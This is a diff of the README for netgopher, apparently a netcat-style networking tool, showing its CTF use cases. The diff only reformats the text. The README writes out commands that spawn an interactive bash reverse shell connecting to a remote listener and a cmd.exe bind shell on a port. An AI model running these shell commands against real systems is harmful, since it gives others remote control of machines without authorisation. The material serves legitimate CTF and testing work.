Blackfell/netgopher/README.md

 ![Listener & connect example image](assets/basic.gif)

 ## CTF Use Cases
 Some really common use cases I have are:

-Start an interactive Bash shell and connect back to a remote listener:
+### Start an interactive Bash shell and connect back to a remote listener:
 ```
 # Start a listener on your remote machine
 ❯ ng -l 1234
 # Start the shell
 ❯ ng -c remote_host:1234 -e '/bin/bash -i'
 ```

-Or start the same shell on a bind listener; this is useful because you can create as many conenctions as you like - if your shell drops, just re-connect.
+### Start the same shell on a bind listener.
+This is useful in certail cases because you can create as many conenctions as you like - if your shell drops, just re-connect.
 ```
 ❯ ng -l 1234 -e 'cmd.exe'
 # Now connect up to the shell